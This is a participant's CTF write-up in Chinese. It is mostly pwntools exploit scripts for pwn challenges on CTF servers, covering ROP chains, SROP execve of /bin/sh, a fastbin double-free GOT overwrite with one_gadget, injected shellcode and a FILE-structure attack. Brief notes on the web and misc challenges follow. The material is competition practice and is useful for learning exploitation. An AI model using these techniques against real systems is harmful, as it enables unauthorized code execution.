个人信息

比赛昵称:不会pwn就哭

姓名:贺宇超

ezlogin

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
context.log_level="debug"
#p=process('./maybeheap')


for i in range(1,20):
    p = remote("ctf.v50to.cc", 10468)
    p.sendlineafter("Choice:", b'1')
    #attach(p)
    p.sendlineafter("Enter index (0-9) to add a new Chunk: ", str(i*-1))

    p.sendlineafter("Enter name for the new Chunk (up to 16 characters): ", p64(0x0401228))
    p.interactive()

maybeheap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *
context.log_level="debug"
#p=process('./maybeheap')


for i in range(1,20):
    p = remote("ctf.v50to.cc", 10468)
    p.sendlineafter("Choice:", b'1')
    #attach(p)
    p.sendlineafter("Enter index (0-9) to add a new Chunk: ", str(i*-1))

    p.sendlineafter("Enter name for the new Chunk (up to 16 characters): ", p64(0x0401228))
    p.interactive()


ezcsu(企图用非srop的方法做,练练手,有个寄存器没法控制,失败了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *
context(os = 'linux', arch = 'amd64')
context.log_level="debug"
p=process('./ezcsu')
#p = remote("ctf.v50to.cc", 11295)
rdi_ret=0x00000000004007f3
rsi_r15_ret=0x00000000004007f1
eax_0_leave_ret=0x00000000040075C
sys_1_write=0x0000000000400777
sys_ret=0x000000000040077E
main=0x0000000004006F3
rbp_ret=0x0000000000400620
one=0x45226
rbx_rbp_r12_13_14_15=0x0000000004007EA
set_eax_0=0x000000000400727


payload=0x68*b'a'+p64(rdi_ret)+p64(0)+p64(rsi_r15_ret)+p64(0x000000000601038)+p64(0)+p64(sys_ret)\
        +p64(0x000000000400727)+p64(rsi_r15_ret)+p64(0x000000000601040)+p64(0)\
        +p64(sys_ret)+p64(rbp_ret)+p64(0x000000000601038)+p64(eax_0_leave_ret)
p.sendlineafter(" power!!",payload)

pause()
payload=p64(0x00000000004007f2)
p.send(payload)

pause()
attach(p)
payload=p64(rsi_r15_ret)+p64(0x000000000601008)+p64(0)+p64(sys_ret)\
        +p64(set_eax_0)+p64(rsi_r15_ret)+p64(0x00000000060100a)+p64(0)+p64(sys_ret)\
    +p64(rdi_ret)+p64(0x000000000601008)+p64(sys_ret)+p64(set_eax_0)\
    +p64(rdi_ret)+p64(3)+p64(rsi_r15_ret)+p64(0x3fd000)+p64(0)+p64(sys_ret)\
    +p64(rdi_ret)+p64(1)+p64(rsi_r15_ret)+p64(0x3fd000)+p64(0)+p64(sys_ret)
p.send(payload)
pause()

p.send(b'fl')
pause()
p.send(b'ag')
p.interactive()



ezcsu(最终版)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
from pwn import *
context(os = 'linux', arch = 'amd64')
context.log_level="debug"
#p=process('./ezcsu')
p = remote("ctf.v50to.cc", 11295)
rdi_ret=0x00000000004007f3
rsi_r15_ret=0x00000000004007f1
eax_0_leave_ret=0x00000000040075C
sys_1_write=0x0000000000400777
sys_ret=0x000000000040077E
main=0x0000000004006F3
rbp_ret=0x0000000000400620
one=0x45226
rbx_rbp_r12_13_14_15=0x0000000004007EA
set_eax_0=0x000000000400727


payload=0x68*b'a'+p64(rdi_ret)+p64(0)+p64(rsi_r15_ret)+p64(0x000000000601038)+p64(0)+p64(sys_ret)\
        +p64(0x000000000400727)+p64(rsi_r15_ret)+p64(0x000000000601040)+p64(0)\
        +p64(sys_ret)+p64(rbp_ret)+p64(0x000000000601038)+p64(eax_0_leave_ret)
p.sendlineafter(" power!!",payload)

#pause()
payload=p64(0x00000000004007f2)
p.send(payload)

frame = SigreturnFrame(kernel="amd64")
frame.rax = 59
frame.rdi = 0x000000000601008
frame.rsi = 0
frame.rdx = 0
frame.rip = sys_ret

payload=p64(rsi_r15_ret)+p64(0x000000000601008)+p64(0)+p64(sys_ret)+p64(sys_ret)+b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x10`\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00~\x07@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x003\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
#attach(p)
pause()
p.send(payload)

p.send(b'/bin/sh\x00'+b'a'*7)

p.interactive()





'''
0x00000000004007ec : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007ee : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007f0 : pop r14 ; pop r15 ; ret
0x00000000004007f2 : pop r15 ; ret
0x00000000004007eb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007ef : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400620 : pop rbp ; ret
0x00000000004007f3 : pop rdi ; ret
0x00000000004007f1 : pop rsi ; pop r15 ; ret
0x00000000004007ed : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400539 : ret
0x0000000000400542 : ret 0x200a


'''

人生重开(做过,省略)

ezcheckin

好多后门,一个知识点:Linux命令“;”表示再执行下一条,而sh单独也可以作为shell

所以溢出返回地址到;sh那一条去

ezrop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
from pwn import *
from LibcSearcher import *

context(arch='amd64', log_level='debug', os='linux')
elf=ELF('rop')
p=remote('ctf.v50to.cc',11822)
#p=process('./rop')
exit_got=elf.got['_exit']
open_plt=elf.plt['open']
read_plt=elf.plt['read']
write_plt=elf.plt['write']
pop_rdi_ret=0x0000000000401483
pop_rsi_r15_ret=0x0000000000401481
pop_rbp_ret=0x00000000004011fd

p.sendlineafter("your choice:",b'4919')
payload=b'a'*256+p64(0x000000000404060+0x100+0x500+8)+p64(0x000000000401304)
sleep(1)
p.send(payload)

sleep(1)
#attach(p)
#起始于0x000000000404060+0x100+0x500+8
payload=(p64(pop_rdi_ret)+p64(0x000000000404060+0x100+0x500+8-104)+p64(pop_rsi_r15_ret)+p64(4)+p64(0)+\
         p64(open_plt)+p64(pop_rbp_ret)+p64(4212328+0x70-0x100-0x30)+p64(0x000000000401304)+\
         p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_r15_ret)+p64(0x000000000404060)+p64(0)+\
         p64(read_plt)+p64(pop_rdi_ret)+p64(1)+p64(write_plt)+p64(0x00000000040139C)+b'./flag\x00r\x00'
         ).ljust(256,b'a')+p64(0x000000000404060+0x500)+p64(0x000000000401304)
        #0x100
p.send(payload)
#跳转到0x000000000404060+0x500
sleep(1)
p.send(b'lalala')

sleep(1)
p.send(b'lalala')
p.interactive()

'''
Gadgets information
============================================================
0x000000000040147c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040147e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000401480 : pop r14 ; pop r15 ; ret
0x0000000000401482 : pop r15 ; ret
0x000000000040147b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040147f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004011fd : pop rbp ; ret
0x0000000000401483 : pop rdi ; ret
0x0000000000401481 : pop rsi ; pop r15 ; ret
0x000000000040147d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040101a : ret
0x0000000000401277 : ret 0x2be



'''

heap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *

context(log_level='debug')
#p=process('./ezheap')
p=remote("ctf.qwq.cc",13288)
elf=ELF('ezheap')
libc=ELF('libc-2.23.so')

def add(size,name,kind):
    p.sendlineafter("Your choice : ",b'1')
    p.sendlineafter("Length of the name :",str(size))
    p.sendafter("The name of animal :",name)#buf
    p.sendlineafter("The kind of the animal :",kind)#scanf

def dele(num):
    p.sendlineafter("Your choice : ",b'3')
    p.sendlineafter("Which animal do you want to remove from the cage:",str(num))


def show():
    p.sendlineafter("Your choice : ", b'2')
#attach(p)
add(0x58,b'heshi',b'1')
add(0x58,b'heshi',b'1')

dele(0)
dele(1)
dele(0)

add(0x58,p64(0x000000000602018-0x10-14),b'1')#可修改的内容在这个地址后16字节
add(0x58,b'0',b'1')
add(0x58,b'0',b'1')
add(0x58,b'0'*14,b'1')

show()

libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))-libc.sym['free']
print(hex(libc_base))
one=[0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget=libc_base+one[1]

dele(3)
dele(4)
dele(3)


add(0x58,p64(0x000000000602018-0x10-14),b'1')#可修改的内容在这个地址后16字节
add(0x58,b'0',b'1')
add(0x58,b'0',b'1')
#attach(p)
add(0x58,b'0'*22+p64(one_gadget),b'1')

p.interactive()

爆破版(暂存)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
from pwn import *


def add(size, name, kind):
    p.sendlineafter("Your choice : ", b'1')
    p.sendlineafter("Length of the name :", str(size))
    p.sendlineafter("The name of animal :", name)  # buf
    p.sendlineafter("The kind of the animal :", kind)  # scanf


def dele(num):
    p.sendlineafter("Your choice : ", b'3')
    p.sendlineafter("Which animal do you want to remove from the cage:", str(num))


def show():
    p.sendlineafter("Your choice : ", b'2')


def pwn(i):
    elf = ELF('ezheap')
    # attach(p)
    add(0x58, b'heshi', b'1')
    add(0x58, b'heshi', b'1')
    add(0x58, b'heshi', b'1')

    dele(0)
    dele(1)
    dele(0)


    add(0x58, p64(0x602018 - 0x10 - i), b'1')  # 可修改的内容在这个地址后16字节
    add(0x58, b'heshi', b'1')
    add(0x58, b'heshi', b'1')


context(log_level='debug')
for i in range(0x58):
    p = process('./ezheap')

    pwn(i)
    try:
        #attach(p)
        add(0x58, b'heshi', b'1')
        wrong = p.recvline()
        if b'malloc():' in wrong:
            continue
        print(i)
        p.interactive()
    except:
        pass



one爆破(不知道libc_main在哪)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from pwn import *

context.log_level='debug'
def pwn(i):
    #p = process("./one")
    p=remote("ctf.qwq.cc",13351)
    p.recvuntil("= ")
    main = p.recvuntil(" and")[:-4]
    main = int(main, 16)
    base_process = main - 0x13B8
    exit_addr = base_process + 0x4050
    p.recvuntil("=  ")
    stack = p.recvuntil("\n")[:-1]
    stack = int(stack, 16)
    print(hex(base_process))
    print(hex(stack))
    #attach(p)
    p.sendlineafter("What address you want to write?", hex(exit_addr))
    p.sendlineafter("What value you want to write?",str(i))
    p.sendlineafter("What address you want to modify?",hex(stack))
    print(i)
    p.interactive()


for i in range(0x100):
    try:
        pwn(i)
    except:
        pass

one正式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *

context(arch='amd64', log_level='debug', os='linux')
#p = process("./one")
p=remote("ctf.qwq.cc",13392)

p.recvuntil("= ")
main = p.recvuntil(" and")[:-4]
main = int(main, 16)
base_process = main - 0x13B8
exit_addr = base_process + 0x4050
target = base_process + 0x12A0

p.recvuntil("=  ")

stack = p.recvuntil("\n")[:-1]
stack = int(stack, 16)
print(hex(base_process))
print(hex(stack))
# attach(p)
# 第一次,改exit的got到libc_main_start,死循环
p.sendlineafter("What address you want to write?", hex(exit_addr))
p.sendlineafter("What value you want to write?", str(240))
p.sendlineafter("What address you want to modify?", hex(base_process + 0x1000))

# 第二次修改read的大小,变成栈溢出
p.sendlineafter("What address you want to write?", hex(target))
p.sendlineafter("What value you want to write?", str(0xAA))


shell = asm(shellcraft.sh())
payload = (hex((stack//0x1000)*0x1000).encode() + b'\x00').ljust(0x20, b'a')+p64(stack-1000) + p64(stack + 0x7ffe8f0733f0 - 0x7ffe8f07351c) + shell
#attach(p)
p.sendlineafter("What address you want to modify?", payload)

p.interactive()

note暂存(做不出来)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
from pwn import *

context(log_level='debug')
p=process('./eznote')
#p=remote("ctf.qwq.cc",13395)

elf=ELF('ezheap')
libc=ELF('libc-2.23.so')

def add(size,context):
    p.sendafter("Your choice",b'1')
    p.sendafter("Length of Note",str(size))
    p.sendafter("Content of Note:",context)#buf

def edit(index,size,context):
    p.sendafter("Your choice", b'2')
    p.sendafter("Index :",str(index))
    p.sendafter("Length of Note : ", str(size))
    p.sendafter("Content of Note", context)  # buf


def show(index):
    p.sendafter("Your choice ", b'3')
    p.sendafter("Index",str(index))

p.recvuntil("A gift for you~: ")
heap=p.recvline()[:-1]
heapbase=int(heap,16)-0x55eace242010+0x55eace242000
print(hex(heapbase))
sleep(1)

add(0x10,b'123')
payload=b'a'*0x10+p64(0xffffffffffffffff)+b"\xb1\x00\x00"
edit(0,0x50,payload)
add(0x100,b'123')
add(0x40,b'a'*8)

show(2)

p.recvuntil('aaaaaaaa')
libcbase=u64(p.recv(6).ljust(8,b'\x00'))+0x7f363b43c000-0x7f363b800b78
print(hex(libcbase))

io_list_all=libcbase+libc.symbols['_IO_list_all']
system_addr=libcbase+libc.symbols['system']
realloc_hook=libcbase+libc.symbols['__realloc_hook']

log.success("heapbase: "+hex(heapbase))
log.success("realloc_hook: "+hex(realloc_hook))


vtable_addr = heapbase +0x140

pad =p64(0)*3+p64(system_addr) # vtable
pad += p32(6)+p32(6)+p64(0)

stream = b"/bin/sh\x00"+p64(0x61)
stream += p64(0xddaa)+p64(io_list_all-0x10)
stream +=p64(1)+p64(2) # fp->_IO_write_ptr > fp->_IO_write_base
stream = stream.ljust(0xc0,b"\x00")
stream += p64(0) # mode<=0
stream += p64(0)
stream += p64(0)
stream += p64(vtable_addr)

payload = pad + stream

attach(p,
       '''
       finish\n
       
       ''')
edit(0,0x800,payload)

p.recvuntil('Your choice : ')
p.sendline(str(1))
p.interactive()


# gdb.attach(r,
#     '''
#     b*$rebase(0xda5)\n
#     c\n
#     vmmap\n
#     '''
#     )

1024

复制分组对抗的exp,改端口,通

逆向

逆向部分除了ezida是自己自己动调的,剩下全看百度,如有疑问私我,我给你演示怎么搜。(ps:我猜cc也看不到这句话)

web

上网一搜,参数一换,通

杂项

噩梦

wps提取图片,根据大小排列,出

踩踩

搜文件名,下软件,提取图片里面隐藏的图片。塞软件,出。

密码1

随波逐流一把梭